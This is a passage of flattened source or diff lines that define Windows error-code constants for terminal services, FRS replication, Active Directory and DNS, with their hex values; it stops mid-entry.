ERROR_CTX_LOGON_DISABLED = 0x1B7D + ERROR_CTX_NOT_CONSOLE = 0x1B7E + ERROR_CTX_CLIENT_QUERY_TIMEOUT = 0x1B80 + ERROR_CTX_CONSOLE_DISCONNECT = 0x1B81 + ERROR_CTX_CONSOLE_CONNECT = 0x1B82 + ERROR_CTX_SHADOW_DENIED = 0x1B84 + ERROR_CTX_WINSTATION_ACCESS_DENIED = 0x1B85 + ERROR_CTX_INVALID_WD = 0x1B89 + ERROR_CTX_SHADOW_INVALID = 0x1B8A + ERROR_CTX_SHADOW_DISABLED = 0x1B8B + ERROR_CTX_CLIENT_LICENSE_IN_USE = 0x1B8C + ERROR_CTX_CLIENT_LICENSE_NOT_SET = 0x1B8D + ERROR_CTX_LICENSE_NOT_AVAILABLE = 0x1B8E + ERROR_CTX_LICENSE_CLIENT_INVALID = 0x1B8F + ERROR_CTX_LICENSE_EXPIRED = 0x1B90 + ERROR_CTX_SHADOW_NOT_RUNNING = 0x1B91 + ERROR_CTX_SHADOW_ENDED_BY_MODE_CHANGE = 0x1B92 + ERROR_ACTIVATION_COUNT_EXCEEDED = 0x1B93 + ERROR_CTX_WINSTATIONS_DISABLED = 0x1B94 + ERROR_CTX_ENCRYPTION_LEVEL_REQUIRED = 0x1B95 + ERROR_CTX_SESSION_IN_USE = 0x1B96 + ERROR_CTX_NO_FORCE_LOGOFF = 0x1B97 + ERROR_CTX_ACCOUNT_RESTRICTION = 0x1B98 + ERROR_RDP_PROTOCOL_ERROR = 0x1B99 + ERROR_CTX_CDM_CONNECT = 0x1B9A + ERROR_CTX_CDM_DISCONNECT = 0x1B9B + ERROR_CTX_SECURITY_LAYER_ERROR = 0x1B9C + ERROR_TS_INCOMPATIBLE_SESSIONS = 0x1B9D + ERROR_TS_VIDEO_SUBSYSTEM_ERROR = 0x1B9E + FRS_ERR_INVALID_API_SEQUENCE = 0x1F41 + FRS_ERR_STARTING_SERVICE = 0x1F42 + FRS_ERR_STOPPING_SERVICE = 0x1F43 + FRS_ERR_INTERNAL_API = 0x1F44 + FRS_ERR_INTERNAL = 0x1F45 + FRS_ERR_SERVICE_COMM = 0x1F46 + FRS_ERR_INSUFFICIENT_PRIV = 0x1F47 + FRS_ERR_AUTHENTICATION = 0x1F48 + FRS_ERR_PARENT_INSUFFICIENT_PRIV = 0x1F49 + FRS_ERR_PARENT_AUTHENTICATION = 0x1F4A + FRS_ERR_CHILD_TO_PARENT_COMM = 0x1F4B + FRS_ERR_PARENT_TO_CHILD_COMM = 0x1F4C + FRS_ERR_SYSVOL_POPULATE = 0x1F4D + FRS_ERR_SYSVOL_POPULATE_TIMEOUT = 0x1F4E + FRS_ERR_SYSVOL_IS_BUSY = 0x1F4F + FRS_ERR_SYSVOL_DEMOTE = 0x1F50 + FRS_ERR_INVALID_SERVICE_PARAMETER = 0x1F51 + ERROR_DS_NOT_INSTALLED = 0x2008 + ERROR_DS_MEMBERSHIP_EVALUATED_LOCALLY = 0x2009 + ERROR_DS_NO_ATTRIBUTE_OR_VALUE = 0x200A + ERROR_DS_INVALID_ATTRIBUTE_SYNTAX = 0x200B + ERROR_DS_ATTRIBUTE_TYPE_UNDEFINED = 0x200C + ERROR_DS_ATTRIBUTE_OR_VALUE_EXISTS = 0x200D + ERROR_DS_BUSY = 0x200E + ERROR_DS_UNAVAILABLE = 0x200F + ERROR_DS_NO_RIDS_ALLOCATED = 0x2010 + ERROR_DS_NO_MORE_RIDS = 0x2011 + ERROR_DS_INCORRECT_ROLE_OWNER = 0x2012 + ERROR_DS_RIDMGR_INIT_ERROR = 0x2013 + ERROR_DS_OBJ_CLASS_VIOLATION = 0x2014 + ERROR_DS_CANT_ON_NON_LEAF = 0x2015 + ERROR_DS_CANT_ON_RDN = 0x2016 + ERROR_DS_CANT_MOD_OBJ_CLASS = 0x2017 + ERROR_DS_CROSS_DOM_MOVE_ERROR = 0x2018 + ERROR_DS_GC_NOT_AVAILABLE = 0x2019 + ERROR_SHARED_POLICY = 0x201A + ERROR_POLICY_OBJECT_NOT_FOUND = 0x201B + ERROR_POLICY_ONLY_IN_DS = 0x201C + ERROR_PROMOTION_ACTIVE = 0x201D + ERROR_NO_PROMOTION_ACTIVE = 0x201E + ERROR_DS_OPERATIONS_ERROR = 0x2020 + ERROR_DS_PROTOCOL_ERROR = 0x2021 + ERROR_DS_TIMELIMIT_EXCEEDED = 0x2022 + ERROR_DS_SIZELIMIT_EXCEEDED = 0x2023 + ERROR_DS_ADMIN_LIMIT_EXCEEDED = 0x2024 + ERROR_DS_COMPARE_FALSE = 0x2025 + ERROR_DS_COMPARE_TRUE = 0x2026 + ERROR_DS_AUTH_METHOD_NOT_SUPPORTED = 0x2027 + ERROR_DS_STRONG_AUTH_REQUIRED = 0x2028 + ERROR_DS_INAPPROPRIATE_AUTH = 0x2029 + ERROR_DS_AUTH_UNKNOWN = 0x202A + ERROR_DS_REFERRAL = 0x202B + ERROR_DS_UNAVAILABLE_CRIT_EXTENSION = 0x202C + ERROR_DS_CONFIDENTIALITY_REQUIRED = 0x202D + ERROR_DS_INAPPROPRIATE_MATCHING = 0x202E + ERROR_DS_CONSTRAINT_VIOLATION = 0x202F + ERROR_DS_NO_SUCH_OBJECT = 0x2030 + ERROR_DS_ALIAS_PROBLEM = 0x2031 + ERROR_DS_INVALID_DN_SYNTAX = 0x2032 + ERROR_DS_IS_LEAF = 0x2033 + ERROR_DS_ALIAS_DEREF_PROBLEM = 0x2034 + ERROR_DS_UNWILLING_TO_PERFORM = 0x2035 + ERROR_DS_LOOP_DETECT = 0x2036 + ERROR_DS_NAMING_VIOLATION = 0x2037 + ERROR_DS_OBJECT_RESULTS_TOO_LARGE = 0x2038 + ERROR_DS_AFFECTS_MULTIPLE_DSAS = 0x2039 + ERROR_DS_SERVER_DOWN = 0x203A + ERROR_DS_LOCAL_ERROR = 0x203B + ERROR_DS_ENCODING_ERROR = 0x203C + ERROR_DS_DECODING_ERROR = 0x203D + ERROR_DS_FILTER_UNKNOWN = 0x203E + ERROR_DS_PARAM_ERROR = 0x203F + ERROR_DS_NOT_SUPPORTED = 0x2040 + ERROR_DS_NO_RESULTS_RETURNED = 0x2041 + ERROR_DS_CONTROL_NOT_FOUND = 0x2042 + ERROR_DS_CLIENT_LOOP = 0x2043 + ERROR_DS_REFERRAL_LIMIT_EXCEEDED = 0x2044 + ERROR_DS_SORT_CONTROL_MISSING = 0x2045 + ERROR_DS_OFFSET_RANGE_ERROR = 0x2046 + ERROR_DS_ROOT_MUST_BE_NC = 0x206D + ERROR_DS_ADD_REPLICA_INHIBITED = 0x206E + ERROR_DS_ATT_NOT_DEF_IN_SCHEMA = 0x206F + ERROR_DS_MAX_OBJ_SIZE_EXCEEDED = 0x2070 + ERROR_DS_OBJ_STRING_NAME_EXISTS = 0x2071 + ERROR_DS_NO_RDN_DEFINED_IN_SCHEMA = 0x2072 + ERROR_DS_RDN_DOESNT_MATCH_SCHEMA = 0x2073 + ERROR_DS_NO_REQUESTED_ATTS_FOUND = 0x2074 + ERROR_DS_USER_BUFFER_TO_SMALL = 0x2075 + ERROR_DS_ATT_IS_NOT_ON_OBJ = 0x2076 + ERROR_DS_ILLEGAL_MOD_OPERATION = 0x2077 + ERROR_DS_OBJ_TOO_LARGE = 0x2078 + ERROR_DS_BAD_INSTANCE_TYPE = 0x2079 + ERROR_DS_MASTERDSA_REQUIRED = 0x207A + ERROR_DS_OBJECT_CLASS_REQUIRED = 0x207B + ERROR_DS_MISSING_REQUIRED_ATT = 0x207C + ERROR_DS_ATT_NOT_DEF_FOR_CLASS = 0x207D + ERROR_DS_ATT_ALREADY_EXISTS = 0x207E + ERROR_DS_CANT_ADD_ATT_VALUES = 0x2080 + ERROR_DS_SINGLE_VALUE_CONSTRAINT = 0x2081 + ERROR_DS_RANGE_CONSTRAINT = 0x2082 + ERROR_DS_ATT_VAL_ALREADY_EXISTS = 0x2083 + ERROR_DS_CANT_REM_MISSING_ATT = 0x2084 + ERROR_DS_CANT_REM_MISSING_ATT_VAL = 0x2085 + ERROR_DS_ROOT_CANT_BE_SUBREF = 0x2086 + ERROR_DS_NO_CHAINING = 0x2087 + ERROR_DS_NO_CHAINED_EVAL = 0x2088 + ERROR_DS_NO_PARENT_OBJECT = 0x2089 + ERROR_DS_PARENT_IS_AN_ALIAS = 0x208A + ERROR_DS_CANT_MIX_MASTER_AND_REPS = 0x208B + ERROR_DS_CHILDREN_EXIST = 0x208C + ERROR_DS_OBJ_NOT_FOUND = 0x208D + ERROR_DS_ALIASED_OBJ_MISSING = 0x208E + ERROR_DS_BAD_NAME_SYNTAX = 0x208F + ERROR_DS_ALIAS_POINTS_TO_ALIAS = 0x2090 + ERROR_DS_CANT_DEREF_ALIAS = 0x2091 + ERROR_DS_OUT_OF_SCOPE = 0x2092 + ERROR_DS_CANT_DELETE_DSA_OBJ = 0x2094 + ERROR_DS_GENERIC_ERROR = 0x2095 + ERROR_DS_DSA_MUST_BE_INT_MASTER = 0x2096 + ERROR_DS_CLASS_NOT_DSA = 0x2097 + ERROR_DS_INSUFF_ACCESS_RIGHTS = 0x2098 + ERROR_DS_ILLEGAL_SUPERIOR = 0x2099 + ERROR_DS_ATTRIBUTE_OWNED_BY_SAM = 0x209A + ERROR_DS_NAME_TOO_MANY_PARTS = 0x209B + ERROR_DS_NAME_TOO_LONG = 0x209C + ERROR_DS_NAME_VALUE_TOO_LONG = 0x209D + ERROR_DS_NAME_UNPARSEABLE = 0x209E + ERROR_DS_NAME_TYPE_UNKNOWN = 0x209F + ERROR_DS_NOT_AN_OBJECT = 0x20A0 + ERROR_DS_SEC_DESC_TOO_SHORT = 0x20A1 + ERROR_DS_SEC_DESC_INVALID = 0x20A2 + ERROR_DS_NO_DELETED_NAME = 0x20A3 + ERROR_DS_SUBREF_MUST_HAVE_PARENT = 0x20A4 + ERROR_DS_NCNAME_MUST_BE_NC = 0x20A5 + ERROR_DS_CANT_ADD_SYSTEM_ONLY = 0x20A6 + ERROR_DS_CLASS_MUST_BE_CONCRETE = 0x20A7 + ERROR_DS_INVALID_DMD = 0x20A8 + ERROR_DS_OBJ_GUID_EXISTS = 0x20A9 + ERROR_DS_NOT_ON_BACKLINK = 0x20AA + ERROR_DS_NO_CROSSREF_FOR_NC = 0x20AB + ERROR_DS_SHUTTING_DOWN = 0x20AC + ERROR_DS_UNKNOWN_OPERATION = 0x20AD + ERROR_DS_INVALID_ROLE_OWNER = 0x20AE + ERROR_DS_COULDNT_CONTACT_FSMO = 0x20AF + ERROR_DS_CROSS_NC_DN_RENAME = 0x20B0 + ERROR_DS_CANT_MOD_SYSTEM_ONLY = 0x20B1 + ERROR_DS_REPLICATOR_ONLY = 0x20B2 + ERROR_DS_OBJ_CLASS_NOT_DEFINED = 0x20B3 + ERROR_DS_OBJ_CLASS_NOT_SUBCLASS = 0x20B4 + ERROR_DS_NAME_REFERENCE_INVALID = 0x20B5 + ERROR_DS_CROSS_REF_EXISTS = 0x20B6 + ERROR_DS_CANT_DEL_MASTER_CROSSREF = 0x20B7 + ERROR_DS_SUBTREE_NOTIFY_NOT_NC_HEAD = 0x20B8 + ERROR_DS_NOTIFY_FILTER_TOO_COMPLEX = 0x20B9 + ERROR_DS_DUP_RDN = 0x20BA + ERROR_DS_DUP_OID = 0x20BB + ERROR_DS_DUP_MAPI_ID = 0x20BC + ERROR_DS_DUP_SCHEMA_ID_GUID = 0x20BD + ERROR_DS_DUP_LDAP_DISPLAY_NAME = 0x20BE + ERROR_DS_SEMANTIC_ATT_TEST = 0x20BF + ERROR_DS_SYNTAX_MISMATCH = 0x20C0 + ERROR_DS_EXISTS_IN_MUST_HAVE = 0x20C1 + ERROR_DS_EXISTS_IN_MAY_HAVE = 0x20C2 + ERROR_DS_NONEXISTENT_MAY_HAVE = 0x20C3 + ERROR_DS_NONEXISTENT_MUST_HAVE = 0x20C4 + ERROR_DS_AUX_CLS_TEST_FAIL = 0x20C5 + ERROR_DS_NONEXISTENT_POSS_SUP = 0x20C6 + ERROR_DS_SUB_CLS_TEST_FAIL = 0x20C7 + ERROR_DS_BAD_RDN_ATT_ID_SYNTAX = 0x20C8 + ERROR_DS_EXISTS_IN_AUX_CLS = 0x20C9 + ERROR_DS_EXISTS_IN_SUB_CLS = 0x20CA + ERROR_DS_EXISTS_IN_POSS_SUP = 0x20CB + ERROR_DS_RECALCSCHEMA_FAILED = 0x20CC + ERROR_DS_TREE_DELETE_NOT_FINISHED = 0x20CD + ERROR_DS_CANT_DELETE = 0x20CE + ERROR_DS_ATT_SCHEMA_REQ_ID = 0x20CF + ERROR_DS_BAD_ATT_SCHEMA_SYNTAX = 0x20D0 + ERROR_DS_CANT_CACHE_ATT = 0x20D1 + ERROR_DS_CANT_CACHE_CLASS = 0x20D2 + ERROR_DS_CANT_REMOVE_ATT_CACHE = 0x20D3 + ERROR_DS_CANT_REMOVE_CLASS_CACHE = 0x20D4 + ERROR_DS_CANT_RETRIEVE_DN = 0x20D5 + ERROR_DS_MISSING_SUPREF = 0x20D6 + ERROR_DS_CANT_RETRIEVE_INSTANCE = 0x20D7 + ERROR_DS_CODE_INCONSISTENCY = 0x20D8 + ERROR_DS_DATABASE_ERROR = 0x20D9 + ERROR_DS_GOVERNSID_MISSING = 0x20DA + ERROR_DS_MISSING_EXPECTED_ATT = 0x20DB + ERROR_DS_NCNAME_MISSING_CR_REF = 0x20DC + ERROR_DS_SECURITY_CHECKING_ERROR = 0x20DD + ERROR_DS_SCHEMA_NOT_LOADED = 0x20DE + ERROR_DS_SCHEMA_ALLOC_FAILED = 0x20DF + ERROR_DS_ATT_SCHEMA_REQ_SYNTAX = 0x20E0 + ERROR_DS_GCVERIFY_ERROR = 0x20E1 + ERROR_DS_DRA_SCHEMA_MISMATCH = 0x20E2 + ERROR_DS_CANT_FIND_DSA_OBJ = 0x20E3 + ERROR_DS_CANT_FIND_EXPECTED_NC = 0x20E4 + ERROR_DS_CANT_FIND_NC_IN_CACHE = 0x20E5 + ERROR_DS_CANT_RETRIEVE_CHILD = 0x20E6 + ERROR_DS_SECURITY_ILLEGAL_MODIFY = 0x20E7 + ERROR_DS_CANT_REPLACE_HIDDEN_REC = 0x20E8 + ERROR_DS_BAD_HIERARCHY_FILE = 0x20E9 + ERROR_DS_BUILD_HIERARCHY_TABLE_FAILED = 0x20EA + ERROR_DS_CONFIG_PARAM_MISSING = 0x20EB + ERROR_DS_COUNTING_AB_INDICES_FAILED = 0x20EC + ERROR_DS_HIERARCHY_TABLE_MALLOC_FAILED = 0x20ED + ERROR_DS_INTERNAL_FAILURE = 0x20EE + ERROR_DS_UNKNOWN_ERROR = 0x20EF + ERROR_DS_ROOT_REQUIRES_CLASS_TOP = 0x20F0 + ERROR_DS_REFUSING_FSMO_ROLES = 0x20F1 + ERROR_DS_MISSING_FSMO_SETTINGS = 0x20F2 + ERROR_DS_UNABLE_TO_SURRENDER_ROLES = 0x20F3 + ERROR_DS_DRA_GENERIC = 0x20F4 + ERROR_DS_DRA_INVALID_PARAMETER = 0x20F5 + ERROR_DS_DRA_BUSY = 0x20F6 + ERROR_DS_DRA_BAD_DN = 0x20F7 + ERROR_DS_DRA_BAD_NC = 0x20F8 + ERROR_DS_DRA_DN_EXISTS = 0x20F9 + ERROR_DS_DRA_INTERNAL_ERROR = 0x20FA + ERROR_DS_DRA_INCONSISTENT_DIT = 0x20FB + ERROR_DS_DRA_CONNECTION_FAILED = 0x20FC + ERROR_DS_DRA_BAD_INSTANCE_TYPE = 0x20FD + ERROR_DS_DRA_OUT_OF_MEM = 0x20FE + ERROR_DS_DRA_MAIL_PROBLEM = 0x20FF + ERROR_DS_DRA_REF_ALREADY_EXISTS = 0x2100 + ERROR_DS_DRA_REF_NOT_FOUND = 0x2101 + ERROR_DS_DRA_OBJ_IS_REP_SOURCE = 0x2102 + ERROR_DS_DRA_DB_ERROR = 0x2103 + ERROR_DS_DRA_NO_REPLICA = 0x2104 + ERROR_DS_DRA_ACCESS_DENIED = 0x2105 + ERROR_DS_DRA_NOT_SUPPORTED = 0x2106 + ERROR_DS_DRA_RPC_CANCELLED = 0x2107 + ERROR_DS_DRA_SOURCE_DISABLED = 0x2108 + ERROR_DS_DRA_SINK_DISABLED = 0x2109 + ERROR_DS_DRA_NAME_COLLISION = 0x210A + ERROR_DS_DRA_SOURCE_REINSTALLED = 0x210B + ERROR_DS_DRA_MISSING_PARENT = 0x210C + ERROR_DS_DRA_PREEMPTED = 0x210D + ERROR_DS_DRA_ABANDON_SYNC = 0x210E + ERROR_DS_DRA_SHUTDOWN = 0x210F + ERROR_DS_DRA_INCOMPATIBLE_PARTIAL_SET = 0x2110 + ERROR_DS_DRA_SOURCE_IS_PARTIAL_REPLICA = 0x2111 + ERROR_DS_DRA_EXTN_CONNECTION_FAILED = 0x2112 + ERROR_DS_INSTALL_SCHEMA_MISMATCH = 0x2113 + ERROR_DS_DUP_LINK_ID = 0x2114 + ERROR_DS_NAME_ERROR_RESOLVING = 0x2115 + ERROR_DS_NAME_ERROR_NOT_FOUND = 0x2116 + ERROR_DS_NAME_ERROR_NOT_UNIQUE = 0x2117 + ERROR_DS_NAME_ERROR_NO_MAPPING = 0x2118 + ERROR_DS_NAME_ERROR_DOMAIN_ONLY = 0x2119 + ERROR_DS_NAME_ERROR_NO_SYNTACTICAL_MAPPING = 0x211A + ERROR_DS_CONSTRUCTED_ATT_MOD = 0x211B + ERROR_DS_WRONG_OM_OBJ_CLASS = 0x211C + ERROR_DS_DRA_REPL_PENDING = 0x211D + ERROR_DS_DS_REQUIRED = 0x211E + ERROR_DS_INVALID_LDAP_DISPLAY_NAME = 0x211F + ERROR_DS_NON_BASE_SEARCH = 0x2120 + ERROR_DS_CANT_RETRIEVE_ATTS = 0x2121 + ERROR_DS_BACKLINK_WITHOUT_LINK = 0x2122 + ERROR_DS_EPOCH_MISMATCH = 0x2123 + ERROR_DS_SRC_NAME_MISMATCH = 0x2124 + ERROR_DS_SRC_AND_DST_NC_IDENTICAL = 0x2125 + ERROR_DS_DST_NC_MISMATCH = 0x2126 + ERROR_DS_NOT_AUTHORITIVE_FOR_DST_NC = 0x2127 + ERROR_DS_SRC_GUID_MISMATCH = 0x2128 + ERROR_DS_CANT_MOVE_DELETED_OBJECT = 0x2129 + ERROR_DS_PDC_OPERATION_IN_PROGRESS = 0x212A + ERROR_DS_CROSS_DOMAIN_CLEANUP_REQD = 0x212B + ERROR_DS_ILLEGAL_XDOM_MOVE_OPERATION = 0x212C + ERROR_DS_CANT_WITH_ACCT_GROUP_MEMBERSHPS = 0x212D + ERROR_DS_NC_MUST_HAVE_NC_PARENT = 0x212E + ERROR_DS_CR_IMPOSSIBLE_TO_VALIDATE = 0x212F + ERROR_DS_DST_DOMAIN_NOT_NATIVE = 0x2130 + ERROR_DS_MISSING_INFRASTRUCTURE_CONTAINER = 0x2131 + ERROR_DS_CANT_MOVE_ACCOUNT_GROUP = 0x2132 + ERROR_DS_CANT_MOVE_RESOURCE_GROUP = 0x2133 + ERROR_DS_INVALID_SEARCH_FLAG = 0x2134 + ERROR_DS_NO_TREE_DELETE_ABOVE_NC = 0x2135 + ERROR_DS_COULDNT_LOCK_TREE_FOR_DELETE = 0x2136 + ERROR_DS_COULDNT_IDENTIFY_OBJECTS_FOR_TREE_DELETE = 0x2137 + ERROR_DS_SAM_INIT_FAILURE = 0x2138 + ERROR_DS_SENSITIVE_GROUP_VIOLATION = 0x2139 + ERROR_DS_CANT_MOD_PRIMARYGROUPID = 0x213A + ERROR_DS_ILLEGAL_BASE_SCHEMA_MOD = 0x213B + ERROR_DS_NONSAFE_SCHEMA_CHANGE = 0x213C + ERROR_DS_SCHEMA_UPDATE_DISALLOWED = 0x213D + ERROR_DS_CANT_CREATE_UNDER_SCHEMA = 0x213E + ERROR_DS_INSTALL_NO_SRC_SCH_VERSION = 0x213F + ERROR_DS_INSTALL_NO_SCH_VERSION_IN_INIFILE = 0x2140 + ERROR_DS_INVALID_GROUP_TYPE = 0x2141 + ERROR_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN = 0x2142 + ERROR_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN = 0x2143 + ERROR_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER = 0x2144 + ERROR_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER = 0x2145 + ERROR_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER = 0x2146 + ERROR_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER = 0x2147 + ERROR_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER = 0x2148 + ERROR_DS_HAVE_PRIMARY_MEMBERS = 0x2149 + ERROR_DS_STRING_SD_CONVERSION_FAILED = 0x214A + ERROR_DS_NAMING_MASTER_GC = 0x214B + ERROR_DS_LOOKUP_FAILURE = 0x214C + ERROR_DS_COULDNT_UPDATE_SPNS = 0x214D + ERROR_DS_CANT_RETRIEVE_SD = 0x214E + ERROR_DS_KEY_NOT_UNIQUE. = 0x214F + ERROR_DS_WRONG_LINKED_ATT_SYNTAX = 0x2150 + ERROR_DS_SAM_NEED_BOOTKEY_PASSWORD = 0x2151 + ERROR_DS_SAM_NEED_BOOTKEY_FLOPPY = 0x2152 + ERROR_DS_CANT_START = 0x2153 + ERROR_DS_INIT_FAILURE = 0x2154 + ERROR_DS_NO_PKT_PRIVACY_ON_CONNECTION = 0x2155 + ERROR_DS_SOURCE_DOMAIN_IN_FOREST = 0x2156 + ERROR_DS_DESTINATION_DOMAIN_NOT_IN_FOREST = 0x2157 + ERROR_DS_DESTINATION_AUDITING_NOT_ENABLED = 0x2158 + ERROR_DS_CANT_FIND_DC_FOR_SRC_DOMAIN = 0x2159 + ERROR_DS_SRC_OBJ_NOT_GROUP_OR_USER = 0x215A + ERROR_DS_SRC_SID_EXISTS_IN_FOREST = 0x215B + ERROR_DS_SRC_AND_DST_OBJECT_CLASS_MISMATCH = 0x215C + ERROR_SAM_INIT_FAILURE = 0x215D + ERROR_DS_DRA_SCHEMA_INFO_SHIP = 0x215E + ERROR_DS_DRA_SCHEMA_CONFLICT = 0x215F + ERROR_DS_DRA_EARLIER_SCHEMA_CONLICT = 0x2160 + ERROR_DS_DRA_OBJ_NC_MISMATCH = 0x2161 + ERROR_DS_NC_STILL_HAS_DSAS = 0x2162 + ERROR_DS_GC_REQUIRED = 0x2163 + ERROR_DS_LOCAL_MEMBER_OF_LOCAL_ONLY = 0x2164 + ERROR_DS_NO_FPO_IN_UNIVERSAL_GROUPS = 0x2165 + ERROR_DS_CANT_ADD_TO_GC = 0x2166 + ERROR_DS_NO_CHECKPOINT_WITH_PDC = 0x2167 + ERROR_DS_SOURCE_AUDITING_NOT_ENABLED = 0x2168 + ERROR_DS_CANT_CREATE_IN_NONDOMAIN_NC = 0x2169 + ERROR_DS_INVALID_NAME_FOR_SPN = 0x216A + ERROR_DS_FILTER_USES_CONTRUCTED_ATTRS = 0x216B + ERROR_DS_UNICODEPWD_NOT_IN_QUOTES = 0x216C + ERROR_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED = 0x216D + ERROR_DS_MUST_BE_RUN_ON_DST_DC = 0x216E + ERROR_DS_SRC_DC_MUST_BE_SP4_OR_GREATER = 0x216F + ERROR_DS_CANT_TREE_DELETE_CRITICAL_OBJ = 0x2170 + ERROR_DS_INIT_FAILURE_CONSOLE = 0x2171 + ERROR_DS_SAM_INIT_FAILURE_CONSOLE = 0x2172 + ERROR_DS_FOREST_VERSION_TOO_HIGH = 0x2173 + ERROR_DS_DOMAIN_VERSION_TOO_HIGH = 0x2174 + ERROR_DS_FOREST_VERSION_TOO_LOW = 0x2175 + ERROR_DS_DOMAIN_VERSION_TOO_LOW = 0x2176 + ERROR_DS_INCOMPATIBLE_VERSION = 0x2177 + ERROR_DS_LOW_DSA_VERSION = 0x2178 + ERROR_DS_NO_BEHAVIOR_VERSION_IN_MIXEDDOMAIN = 0x2179 + ERROR_DS_NOT_SUPPORTED_SORT_ORDER = 0x217A + ERROR_DS_NAME_NOT_UNIQUE = 0x217B + ERROR_DS_MACHINE_ACCOUNT_CREATED_PRENT4 = 0x217C + ERROR_DS_OUT_OF_VERSION_STORE = 0x217D + ERROR_DS_INCOMPATIBLE_CONTROLS_USED = 0x217E + ERROR_DS_NO_REF_DOMAIN = 0x217F + ERROR_DS_RESERVED_LINK_ID = 0x2180 + ERROR_DS_LINK_ID_NOT_AVAILABLE = 0x2181 + ERROR_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER = 0x2182 + ERROR_DS_MODIFYDN_DISALLOWED_BY_INSTANCE_TYPE = 0x2183 + ERROR_DS_NO_OBJECT_MOVE_IN_SCHEMA_NC = 0x2184 + ERROR_DS_MODIFYDN_DISALLOWED_BY_FLAG = 0x2185 + ERROR_DS_MODIFYDN_WRONG_GRANDPARENT = 0x2186 + ERROR_DS_NAME_ERROR_TRUST_REFERRAL = 0x2187 + ERROR_NOT_SUPPORTED_ON_STANDARD_SERVER = 0x2188 + ERROR_DS_CANT_ACCESS_REMOTE_PART_OF_AD = 0x2189 + ERROR_DS_CR_IMPOSSIBLE_TO_VALIDATE_V2 = 0x218A + ERROR_DS_THREAD_LIMIT_EXCEEDED = 0x218B + ERROR_DS_NOT_CLOSEST = 0x218C + ERROR_DS_CANT_DERIVE_SPN_WITHOUT_SERVER_REF = 0x218D + ERROR_DS_SINGLE_USER_MODE_FAILED = 0x218E + ERROR_DS_NTDSCRIPT_SYNTAX_ERROR = 0x218F + ERROR_DS_NTDSCRIPT_PROCESS_ERROR = 0x2190 + ERROR_DS_DIFFERENT_REPL_EPOCHS = 0x2191 + ERROR_DS_DRS_EXTENSIONS_CHANGED = 0x2192 + ERROR_DS_REPLICA_SET_CHANGE_NOT_ALLOWED_ON_DISABLED_CR = 0x2193 + ERROR_DS_NO_MSDS_INTID = 0x2194 + ERROR_DS_DUP_MSDS_INTID = 0x2195 + ERROR_DS_EXISTS_IN_RDNATTID = 0x2196 + ERROR_DS_AUTHORIZATION_FAILED = 0x2197 + ERROR_DS_INVALID_SCRIPT = 0x2198 + ERROR_DS_REMOTE_CROSSREF_OP_FAILED = 0x2199 + ERROR_DS_CROSS_REF_BUSY = 0x219A + ERROR_DS_CANT_DERIVE_SPN_FOR_DELETED_DOMAIN = 0x219B + ERROR_DS_CANT_DEMOTE_WITH_WRITEABLE_NC = 0x219C + ERROR_DS_DUPLICATE_ID_FOUND = 0x219D + ERROR_DS_INSUFFICIENT_ATTR_TO_CREATE_OBJECT = 0x219E + ERROR_DS_GROUP_CONVERSION_ERROR = 0x219F + ERROR_DS_CANT_MOVE_APP_BASIC_GROUP = 0x21A0 + ERROR_DS_CANT_MOVE_APP_QUERY_GROUP = 0x21A1 + ERROR_DS_ROLE_NOT_VERIFIED = 0x21A2 + ERROR_DS_WKO_CONTAINER_CANNOT_BE_SPECIAL = 0x21A3 + ERROR_DS_DOMAIN_RENAME_IN_PROGRESS = 0x21A4 + ERROR_DS_EXISTING_AD_CHILD_NC = 0x21A5 + ERROR_DS_REPL_LIFETIME_EXCEEDED = 0x21A6 + ERROR_DS_DISALLOWED_IN_SYSTEM_CONTAINER = 0x21A7 + ERROR_DS_LDAP_SEND_QUEUE_FULL = 0x21A8 + ERROR_DS_DRA_OUT_SCHEDULE_WINDOW = 0x21A9 + ERROR_DS_POLICY_NOT_KNOWN = 0x21AA + ERROR_NO_SITE_SETTINGS_OBJECT = 0x21AB + ERROR_NO_SECRETS = 0x21AC + ERROR_NO_WRITABLE_DC_FOUND = 0x21AD + ERROR_DS_NO_SERVER_OBJECT = 0x21AE + ERROR_DS_NO_NTDSA_OBJECT = 0x21AF + ERROR_DS_NON_ASQ_SEARCH = 0x21B0 + ERROR_DS_AUDIT_FAILURE = 0x21B1 + ERROR_DS_INVALID_SEARCH_FLAG_SUBTREE = 0x21B2 + ERROR_DS_INVALID_SEARCH_FLAG_TUPLE = 0x21B3 + ERROR_DS_HIERARCHY_TABLE_TOO_DEEP = 0x21B4 + ERROR_DS_DRA_CORRUPT_UTD_VECTOR = 0x21B5 + ERROR_DS_DRA_SECRETS_DENIED = 0x21B6 + ERROR_DS_RESERVED_MAPI_ID = 0x21B7 + ERROR_DS_MAPI_ID_NOT_AVAILABLE = 0x21B8 + ERROR_DS_DRA_MISSING_KRBTGT_SECRET = 0x21B9 + ERROR_DS_DOMAIN_NAME_EXISTS_IN_FOREST = 0x21BA + ERROR_DS_FLAT_NAME_EXISTS_IN_FOREST = 0x21BB + ERROR_INVALID_USER_PRINCIPAL_NAME = 0x21BC + ERROR_DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS = 0x21BD + ERROR_DS_OID_NOT_FOUND = 0x21BE + ERROR_DS_DRA_RECYCLED_TARGET = 0x21BF + DNS_ERROR_RCODE_FORMAT_ERROR = 0x2329 + DNS_ERROR_RCODE_SERVER_FAILURE = 0x232A + DNS_ERROR_RCODE_NAME_ERROR = 0x232B + DNS_ERROR_RCODE_NOT_IMPLEMENTED = 0x232C + DNS_ERROR_RCODE_REFUSED = 0x232D + DNS_ERROR_RCODE_YXDOMAIN = 0x232E + DNS_ERROR_RCODE_YXRRSET = 0x232F + DNS_ERROR_RCODE_NXRRSET = 0x2330 + DNS_ERROR_RCODE_NOTAUTH = 0x2331 + DNS_ERROR_RCODE_NOTZONE = 0x2332 + DNS_ERROR_RCODE_BADSIG = 0x2338 + DNS_ERROR_RCODE_BADKEY = 0x2339 + DNS_ERROR_RCODE_BADTIME = 0x233A + DNS_INFO_NO_RECORDS = 0x251D + DNS_ERROR_BAD_PACKET = 0x251E + DNS_ERROR_NO_PACKET = 